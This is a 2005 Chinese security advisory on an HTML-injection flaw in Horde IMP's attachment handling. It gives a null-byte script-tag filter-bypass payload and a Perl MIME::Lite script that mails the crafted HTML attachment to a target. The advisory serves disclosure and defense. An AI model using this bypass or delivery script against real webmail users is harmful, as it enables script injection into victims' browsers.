安全研究

安全漏洞
Horde IMP邮件附件HTML注入漏洞

发布日期:2005-12-06
更新日期:2005-12-06

受影响系统:
Horde IMP <= 4.0.4
描述:
BUGTRAQ  ID: 15730

IMP是一款基于Web的强大的邮件程序,它由Horde项目组开发。可使用在Linux/Unix或者Microsoft Windows操作系统下。

Horde IMP在处理文件中的HTML标签时存在漏洞,远程攻击者可能在服务器上执行恶意代码。

Horde IMP在实施安全策略时会删除可能有害的HTML标签。在打印附件文件前,Horde会试图删除<script>、<link>之类的标签。但如果攻击者创建如下的标签的话:
      
         <s0x00hcript>alert('HORDE')</s0x00hcript>
         0x00h is an ASCII 00
        
IMP就无法删除<script>脚本,导致执行攻击者所提供的HTML和脚本代码。请注意攻击仅对IE浏览器有效。

<*来源:Igor (sprog@online.ru
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113389183811285&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#
# MIME::Liet SMTP client by C3PO
#
   use strict;
   use MIME::Base64;
   use MIME::Lite;
#----------------------------------------------------
#                    load_file
#----------------------------------------------------
   sub load_file{
      my($file) = shift;
      my($Body);
      open(IN, $file) || die("Can't open $file $!");
      binmode IN;
      read(IN, $Body, -s $file);
      close(IN);
      return $Body;
  }
#----------------------------------------------------
#                      main
#----------------------------------------------------
   my $c = load_file('\Xploits\horder\passed.htm'); #content
   my $m = MIME::Lite->new(
                 From    =>'mail@domain.zone',
                 To      =>'mail@domain.zone',
                 Subject =>'Horde',
                 Date    =>"Tue, 17 Dec 2002 22:00:02 +0300",
                 Type    =>"text/html",
                 Data    => $c,
                 Filename=>"horde.html",
                 Encoding =>'base64'
                 );
  $m->attr('content-type.charset' => 'windows-1251'); #not necessary
  $m->send("smtp","smtp.domain.zone");

建议:
厂商补丁:

Horde
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.horde.org

浏览次数:3222
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障